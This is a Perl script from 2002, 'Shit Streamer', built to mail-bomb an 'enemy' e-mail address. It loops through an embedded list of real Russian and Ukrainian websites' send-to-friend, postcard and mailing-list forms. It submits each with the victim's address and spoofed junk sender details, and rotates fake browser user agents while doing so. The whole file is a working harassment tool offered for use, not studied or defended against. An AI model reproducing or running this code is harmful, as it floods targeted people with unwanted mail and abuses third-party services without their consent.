#!/usr/bin/perl

# Shit Streamer 0.22. Written by Evgeny Stepanischev
$SS_LIST_DATE = '29.01.2002';
$SS_VERSION   = '0.22';

die (<<HELP) unless (@ARGV);

Shit Streamer $SS_VERSION. Site list date: $SS_LIST_DATE. Written by Evgeny Stepanischev.
Usage: $0 <enemy e-mail> [<count>]

HELP

$email = shift;
$count = shift || 10;

$| = 1;
$, = '';

use HTTP::Request::Common;
use LWP::UserAgent;
srand (time ^ $$);

%colors = (
	LIGHT_RED  => "\033[1;31m",
	LIGHT_GREEN => "\033[1;32m",
	YELLOW => "\033[1;33m",
	LIGHT_BLUE => "\033[1;34m",
	MAGENTA => "\033[1;35m",
	LIGHT_CYAN => "\033[1;36m",
	WHITE => "\033[1;37m",
	NORMAL => "\033[0m",
	BLACK => "\033[0;30m",
	RED => "\033[0;31m",
	GREEN => "\033[0;32m",
	BROWN => "\033[0;33m",
	BLUE => "\033[0;34m",
	CYAN => "\033[0;36m",
	BOLD => "\033[1m",
	UNDERSCORE => "\033[4m",
	REVERSE => "\033[7m",
	
);

@agents = (
	# Mozilla based and Netscape Navigator 6.xx
	
	'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.4) Gecko/20011019 Netscape6/6.2',
	'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.5+) Gecko/20011115',
	'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.5) Gecko/20011011',
	'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; Preview) Gecko/20001103 Beonex/0.6-pre',

	# MSIE

	'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)',
	'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
	'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT)',
	'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95; DigExt)',
	'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)',
	'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)',

	# Netscape Communicator 4.xx

	'Mozilla/4.72 [en] (WinNT; I)',
	'Mozilla/4.06 [en] (Win98; I)',
	'Mozilla/4.79 [en] (Windows NT 5.0; U)',
	'Mozilla/4.50 [en] (Windows NT 5.0; U)',

	# Opera

	'Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.0 [en]',
	'Mozilla/4.0 (Windows 95;US) Opera 3.60 [en]',
	'Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 5.12 [en]'
	);

$agent   = $agents[rand @agents];
$ua   = LWP::UserAgent->new(agent => $agent, env_proxy => 1, keep_alive => 0, timeout => 10);

sub colorprint
{
	print "$colors{$_[0]}$_[1]$colors{NORMAL}";
};

sub Send
{
	my ($res, $server, @args);

	colorprint 'GREEN', qq!#$count: Send email from "$_[2]" .. !;
	my $url = $_[1];
	$url =~ s/%s/$_[0]/g;

	if ($_[3] eq 'GET')
	{
		$res = $ua->request(GET $url);
	} else
	{
		my ($server, @args) = split /\?/, $url;
		my %args = ();

		$server.= '?'.shift @args if ($_[3] eq 'GEST');

		for (split /&/, $args[0])
		{
			my ($key, $val) = split /=/;
			$args{$key} = $val;
		};

		$res = $ua->request(POST $server, [%args]);
	};

	unless ($res->is_error)
	{
		colorprint 'GREEN', "ok\n";
	} else
	{
		colorprint 'RED', 'error "'.$res->message.qq{"\n};
	};

	return $res->is_error;
};

sub Empty
{
	colorprint 'RED', "List of shit senders is empty.\n";
	die "\n";
}

colorprint 'WHITE', "Send shit emails to $email.\n";
colorprint 'WHITE', "Connect as $agent.\n";

@urls = ();
@desr = ();
@meth = ();

while (<DATA>)
{
	chomp;
	($desr, $meth, $url) = split /\t+/;
	unless (substr($desr, 0, 1) eq '#')
	{
		push @urls, $url;
		push @desr, $desr;
		push @meth, $meth;
	};
};

Empty unless (@urls);
colorprint 'WHITE', 'List of shit-senders was loaded ('.@urls.
' shit-sender'.(@urls-1?'s':'').", $SS_LIST_DATE).\n\n";

for ($i = 0; $count>0; $count--)
{
	if (Send $email, $urls[$i], $desr[$i], $meth[$i])
	{
		print qq{Address "$desr[$i]" was temporary excluded from list.\n};
		splice @urls, $i, 1;
		splice @desr, $i, 1;
		splice @meth, $i, 1;
		Empty unless (@urls);
	};

	$i = 0 if ++$i > $#urls;
};

__DATA__
MPCR	GEST	http://bas.mypostcards.com/?erotichnaya?filename=image1.jpg&SENDER=shit&SENDEREMAIL=shit@happens.com&recipient=shit&email=%s&postcard_action=send
HOUS	POST	http://myhouse.ru/friend.php?sid=79&yname=Shit&ymail=%s&fname=Shit&fmail=%s&op=SendStory
AVOR	POST	http://migration.avo.ru/friend.php?sid=1&yname=shit&ymail=shit@shit.com&fname=shit&fmail=%s&comments=Shit_happens&op=SendStory
BCAR	POST	http://www.bestcards.kiev.ua/cgi-bin/humor.cgi?email=%s&friend=%s&do=sendto-friend-done&id=171
GBRY	POST	http://www.rep.ru/perl/send-mail.pl?id=2497&send=yes&sender=shit@happens.com&reciver=%s
PHPC	POST	http://www.phpclub.net/friends_ref.phtml?to_name=Shit&to_email=%s&from_name=Shit&from_email=%s&subject=Shit&message=Shit
BUMR	POST	http://bum.ru/send.php?email=%s&name=Shit&text=Shit&ref=/&send=
CONT	POST	http://mlist.list.ru/cgi-bin/subscribe.cgi?list=2283&theme=content_new&ok=%20OK%20&email=%s
UPOR	POST	http://www.uaportal.com/cgi_bin/send_to.cgi?lang=r&news_id=2698&email=%s&nick=Shit&fromemail=%s&SendNews=%20%20%20Ok%20%20%20
FDOC	POST	http://freedoc.vov.ru/php4/catalog/mailfriend.phtml?realurl=freedoc.vov.ru&id=2762&url=;&nameto=Shit&emailto=%s&namefrom=Shit&emailfrom=%s&Send=%20
BURG	POST	http://prodam.e-burg.ru/sendfriend.mas?id=132&mail=%s&senderm=shit@happens.com&sender=Shit&submit=%20>>
EGYP	POST	http://egyptclub.ru/boards/hotels/recomend.php3?ID=%24ID&ref=/boards/hotels/index.php3&ref_in=&to_name=Shit&to=%s&from_name=Shit&from=shit@happens.com&submit=%20%20%20%20%20%20
BARS	POST	http://www.barskov.com/cgi-bin/subscribe-ru.cgi?email1=%s&email2=shit@happens.com&subject=Shit&urlnews=/news/show.html%3Fnews%3D998436759&naction=send2friend&url=/s-result.html
AVEN	GEST	http://avenue.aiq.ru/cgi-bin/YaBB.pl?board=other&action=sendtopic2?y_name=Shit&y_email=shit@happens.com&r_name=Shit&r_email=%s&board=other&topic=1005821621&Send=
SPLE	POST	http://www.spletni.ru/splet_sending.jsp?returnPage=/splet_send.xml&id=a71e19f0b7c2895e41ceaa6518232012&from=shit&email=%s&comment=Shit
911J	POST	http://10.911-job.ru/sf.php?JS=ca5c78ad44f8de5aff1e46276270d233&_t=s&app=eesf&ID=63&action=Send&sjf_fname=Shit&sjf_femail=%s&sjf_sname=Shit&sjf_semail=shit@happens.com&sjf_message=Shit
VBST	POST	http://www.vbstreets.ru/default.asp?page=friend&id=n011_s&type=&&txtkomu=%s&txtsubject=Shit&txtname=Shit&txtcomment=Shit&B1_x=13&B1_y=13&B1=
MANA	POST	http://eda.mana.ru/pc/mail.php?pic=1.jpg&recept=Shit&sender=&mailfrom=shit@happens.com&recipient=Shit&mailto=%s&message=Shit
ADOO	POST	http://www.doo.ru/hum/anek.php3?send=20&sname=Shit&smail=shit@happens.com&fname=Shit&fmail=%s
KNDM	POST	http://www.km.ru/job/vacancy/sendmail_vackm.asp?limit=15&order=0&all=on&duration=0res_section=&memory=&page=1&age_min=&age_max=&education=0&sex=0&shedule=0&salary_min=&salary_max=&cities=&res_sections=&search=&email_to=%s&email_from=shit@happens.com&subj=Shit&send=
PSYB	GET		http://psyberia.ru/mailto.php4?num=pravda/glass&addr=%s
RUSS	GET		http://www.russ.ru/.code/sendbymail.cgi?path=/politics/20011211-kog.html&mail=%s
ANEK	POST	http://www.anekdotov.net/cgi-bin/mail7.cgi?email_addr=%s&story=Shit&podpis=Shit&email_sender=&sections=Shit&remark=Shit&%21=%21